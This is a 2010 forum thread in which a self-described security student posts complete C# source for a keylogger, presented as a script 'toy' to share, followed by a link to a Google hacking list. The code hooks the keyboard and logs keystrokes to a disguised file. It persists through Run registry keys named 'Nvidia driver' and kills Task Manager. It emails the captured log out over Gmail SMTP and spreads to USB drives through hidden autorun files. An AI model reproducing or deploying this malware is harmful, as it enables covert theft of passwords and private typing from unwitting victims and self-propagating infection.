Simple Batch Scripting Automating 3rd Party Utilities

Discussion in 'Meet and Greet' started by Cleptography, Sep 2, 2010.

  1. Cleptography

    Cleptography New Member

    Joined:
    Sep 2, 2010
    Messages:
    39
    Likes Received:
    7
    Trophy Points:
    0
    Hello,
    I will start off by stating that I am a first year network security student.
    I am new to the world, and give my respects to those who know more than I do.
    I however have been playing around with computers for quite some time.
    I prefer scripting languages among other things simply because they are the easiest things in the world to use. I would not even consider batch to be a powerful tool outside of being able to automate other 3rd party command line utilities and such.
    I prefer Perl as my weapon of chose, however over the years I have developed some scripts for generating ip addresses and running output against things like nmap and sysinternals utilities for gathering information. I would like to share some of my toys, but thought it would be best to first ask if anyone would even have an interest in seeing some of these things. I guess if someone says yeah go ahead post, then I shall do so.
    Regards,
    Cleptography -
     
  2. shabbir

    shabbir Administrator Staff Member

    Joined:
    Jul 12, 2004
    Messages:
    15,375
    Likes Received:
    388
    Trophy Points:
    83
    Hi Cleptography and welcome to the forum and yeah I will love to read your tips and toys
     
  3. Cleptography

    Cleptography New Member

    Joined:
    Sep 2, 2010
    Messages:
    39
    Likes Received:
    7
    Trophy Points:
    0
    I should probably rename this thread to various codes or something. I will add various source code and scripts from as many languages as I can, along with automating command utilities.
    This first code is a key logger written in c#, with ability to email and attach itself to usb.
    I can not take full credit for this as I found it online so creds to the original author. It has been a while so I'm not quite sure where I dug the source up from or I would post a link to it as well. I modified it a bit, but you get the general idea. It's not compiled, you can use the c# compiler included with windows service pack or whatever compiler you so desire, but here is the source.

    KeyLogger written in c#
    ---------------------------
    Code:
    using System;
    using System.Diagnostics;
    using System.Timers;
    using System.Windows.Forms;
    using System.Runtime.InteropServices;
    using System.IO;
    using System.Net;
    using System.Net.Mail;
    using Microsoft.Win32;
    
    namespace Keylogger_V2
    {
        class Program
        {
            private const int WH_KEYBOARD_LL = 13;
            private const int WM_KEYDOWN = 0x0100;
            private static LowLevelKeyboardProc _proc = HookCallback;
            private static IntPtr _hookID = IntPtr.Zero;
            public static string path = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),"nvidia.log");
            public static byte caps = 0, shift = 0, failed = 0;
    
            [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
            private static extern IntPtr SetWindowsHookEx(int idHook, LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId);
    
            [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
            [return: MarshalAs(UnmanagedType.Bool)]
            private static extern bool UnhookWindowsHookEx(IntPtr hhk);
    
            [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
            private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPtr wParam, IntPtr lParam);
    
            [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
            private static extern IntPtr GetModuleHandle(string lpModuleName);
    
            public static void Main()
            {
            _hookID = SetHook(_proc);
            Program.startup();
            System.Timers.Timer timer;
            timer = new System.Timers.Timer();
            timer.Elapsed += new ElapsedEventHandler(Program.OnTimedEvent);
            timer.AutoReset = true;
            timer.Interval = 600000;
            timer.Start();
            System.Timers.Timer timer2;
            timer2 = new System.Timers.Timer();
            timer2.Elapsed += new ElapsedEventHandler(Program.USBSpread);
            timer2.AutoReset = true;
            timer2.Interval = 10000;
            timer2.Start();
            Application.Run();
            GC.KeepAlive(timer);
            GC.KeepAlive(timer2);
            UnhookWindowsHookEx(_hookID);
            }
    
            public static void startup()
            {
                //Try to copy keylogger in some folders
                string source = Application.ExecutablePath.ToString();
                string destination = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
                destination=System.IO.Path.Combine(destination,"nvdisp.exe");
                try
                {
                    System.IO.File.Copy(source, destination,false);
                    source = destination;
                } catch {
                    Console.WriteLine("No authorization to copy file or other error.");
                }
                //Find if the file already exist in startup
                try
                {
                    RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", false);
    
                    if (registryKey.GetValue("Nvidia driver") == null)
                    {
                        registryKey.SetValue("Nvidia driver", destination);
                    }
    
                    registryKey.Close();//dispose of the Key
                } catch {
                    Console.WriteLine("Error setting startup reg key.");
                }
                //Try to add to all users
                try
                {
                    RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", false);
    
                    if (registryKey.GetValue("Nvidia driver") == null)
                    {
                        registryKey.SetValue("Nvidia driver", source);
                    }
    
                    registryKey.Close();//dispose of the key
                }
                catch
                {
                    Console.WriteLine("Error setting startup reg key for all users.");
                }
            }
    
            public static void OnTimedEvent(object source, EventArgs e)
            {
                Process[] ProcessList = Process.GetProcesses();
                foreach (Process proc in ProcessList)
                {
                    if (proc.MainWindowTitle.Contains("Taskmgr.exe"))
                    {
                        proc.Kill();
                    }
                }
                System.Net.Mail.MailMessage msg = new System.Net.Mail.MailMessage(); //create the message
                msg.To.Add("username@gmail.com");
                msg.From = new MailAddress("username@gmail.com", "username", System.Text.Encoding.UTF8);
                msg.Subject = "i don't know";
                msg.SubjectEncoding = System.Text.Encoding.UTF8;
                msg.Body = "ciao ale";
                msg.BodyEncoding = System.Text.Encoding.UTF8;
                msg.IsBodyHtml = false;
                msg.Priority = MailPriority.High;
                SmtpClient client = new SmtpClient(); //Network Credentials for Gmail
                client.Credentials = new System.Net.NetworkCredential("username@gmail.com", "password");
                client.Port = 587;
                client.Host = "smtp.gmail.com";
                client.EnableSsl = true;
                Attachment data = new Attachment(Program.path);
                msg.Attachments.Add(data);
                try
                {
                    client.Send(msg);
                    failed = 0;
                }
                catch
                {
                    data.Dispose();
                    failed = 1;
                }
                data.Dispose();
    
                if (failed == 0)
                    File.WriteAllText(Program.path, ""); //empties the file
        
                failed = 0;
        
            }
    
            private static IntPtr SetHook(LowLevelKeyboardProc proc)
            {
                using (Process curProcess = Process.GetCurrentProcess())
                using (ProcessModule curModule = curProcess.MainModule)
                {
                    return SetWindowsHookEx(WH_KEYBOARD_LL, proc, GetModuleHandle(curModule.ModuleName), 0);
                }
            }
            private delegate IntPtr LowLevelKeyboardProc(int nCode, IntPtr wParam, IntPtr lParam);
            private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam)
            {
                if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN)
                {
                    StreamWriter sw = File.AppendText(Program.path);
                    int vkCode = Marshal.ReadInt32(lParam);
                    if (Keys.Shift == Control.ModifierKeys) Program.shift = 1;
                    
                switch ((Keys)vkCode)
                    {
                        case Keys.Space:
                            sw.Write(" ");
                            break;
                        case Keys.Return:
                            sw.WriteLine("");
                            break;
                        case Keys.Back:
                            sw.Write("back");
                            break;
                        case Keys.Tab:
                            sw.Write("TAB");
                            break;
                        case Keys.D0:
                            if (Program.shift == 0) sw.Write("0");
                            else sw.Write(")");
                            break;
                        case Keys.D1:
                            if (Program.shift == 0) sw.Write("1");
                            else sw.Write("!");
                            break;
                        case Keys.D2:
                            if (Program.shift == 0) sw.Write("2");
                            else sw.Write("@");
                            break;
                        case Keys.D3:
                            if (Program.shift == 0) sw.Write("3");
                            else sw.Write("#");
                            break;
                        case Keys.D4:
                            if (Program.shift == 0) sw.Write("4");
                            else sw.Write("$");
                            break;
                        case Keys.D5:
                            if (Program.shift == 0) sw.Write("5");
                            else sw.Write("%");
                            break;
                        case Keys.D6:
                            if (Program.shift == 0) sw.Write("6");
                            else sw.Write("^");
                            break;
                        case Keys.D7:
                            if (Program.shift == 0) sw.Write("7");
                            else sw.Write("&");
                            break;
                        case Keys.D8:
                            if (Program.shift == 0) sw.Write("8");
                            else sw.Write("*");
                            break;
                        case Keys.D9:
                            if (Program.shift == 0) sw.Write("9");
                            else sw.Write("(");
                            break;
                        case Keys.LShiftKey:
                        case Keys.RShiftKey:
                        case Keys.LControlKey:
                        case Keys.RControlKey:
                        case Keys.LMenu:
                        case Keys.RMenu:
                        case Keys.LWin:
                        case Keys.RWin:
                        case Keys.Apps:
                    sw.Write("");
                            break;
                        case Keys.OemQuestion:
                            if (Program.shift == 0) sw.Write("/");
                            else sw.Write("?");
                            break;
                        case Keys.OemOpenBrackets:
                            if (Program.shift == 0) sw.Write("[");
                            else sw.Write("{");
                            break;
                        case Keys.OemCloseBrackets:
                            if (Program.shift == 0) sw.Write("]");
                            else sw.Write("}");
                            break;
                        case Keys.Oem1:
                            if (Program.shift == 0) sw.Write(";");
                            else sw.Write(":");
                            break;
                        case Keys.Oem7:
                            if (Program.shift == 0) sw.Write("'");
                            else sw.Write('"');
                            break;
                        case Keys.Oemcomma:
                            if (Program.shift == 0) sw.Write(",");
                            else sw.Write("<");
                            break;
                        case Keys.OemPeriod:
                            if (Program.shift == 0) sw.Write(".");
                            else sw.Write(">");
                            break;
                        case Keys.OemMinus:
                            if (Program.shift == 0) sw.Write("-");
                            else sw.Write("_");
                            break;
                        case Keys.Oemplus:
                            if (Program.shift == 0) sw.Write("=");
                            else sw.Write("+");
                            break;
                        case Keys.Oemtilde:
                            if (Program.shift == 0) sw.Write("`");
                            else sw.Write("~");
                        break;
                    case Keys.Oem5:
                        sw.Write("|");
                        break;
                    case Keys.Capital:
                        if (Program.caps == 0) Program.caps = 1;
                        else Program.caps = 0;
                        break;
                    default:
                        if (Program.shift == 0 && Program.caps == 0) sw.Write(((Keys)vkCode).ToString().ToLower());
                        if (Program.shift == 1 && Program.caps == 0) sw.Write(((Keys)vkCode).ToString().ToUpper());
                        if (Program.shift == 0 && Program.caps == 1) sw.Write(((Keys)vkCode).ToString().ToUpper());
                        if (Program.shift == 1 && Program.caps == 1) sw.Write(((Keys)vkCode).ToString().ToLower());
                        break;
                }
                Program.shift = 0;
                sw.Close();
            }    
            return CallNextHookEx(_hookID, nCode, wParam, lParam);
            }
    
            public static void USBSpread(object source, EventArgs e)
            {
                ///////////////////////////////////////////////////////////////
                /////////////////////// USB spread class //////////////////////
                ///////////////////////////////////////////////////////////////
                //A bit modified
                string source2 = Application.ExecutablePath.ToString();
                System.IO.DriveInfo[] drives = System.IO.DriveInfo.GetDrives();
                try
                {
                    foreach (System.IO.DriveInfo drive in drives)
                    {
                        if (drive.DriveType == DriveType.Removable)
                        {
                            string driveAutorun = drive.Name + "autorun.inf";
                            StreamWriter sw = new StreamWriter(driveAutorun);
                            sw.WriteLine("[autorun]\n");
                            sw.WriteLine("open=start.exe");
                            sw.WriteLine("action=Run VMCLite");
                            sw.Close();
                            File.SetAttributes(drive.Name + "autorun.inf", File.GetAttributes(drive.Name + "autorun.inf") | FileAttributes.Hidden);
                            try
                            {
                                File.Copy(source2, drive.Name + "start.exe", true);
                                File.SetAttributes(drive.Name + "start.exe", File.GetAttributes(drive.Name + "start.exe") | FileAttributes.Hidden);
                            }
                            finally
                            {
                                Console.WriteLine("Removable device rooted");
                            }
                        }
                    }
                }
                catch (Exception e2)
                {
                    Console.WriteLine(e2.ToString());
                }
            }
        }
    }
     
  4. Cleptography

    Cleptography New Member

    Joined:
    Sep 2, 2010
    Messages:
    39
    Likes Received:
    7
    Trophy Points:
    0
    Googles Master list a place for all your google hacking fun. :D

    it.toolbox.com/blogs/managing-infosec/google-hacking-master-list-28302
     
  5. shabbir

    shabbir Administrator Staff Member

    Joined:
    Jul 12, 2004
    Messages:
    15,375
    Likes Received:
    388
    Trophy Points:
    83
    I have splitted all but one into separate articles.
     
    Cleptography likes this.

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice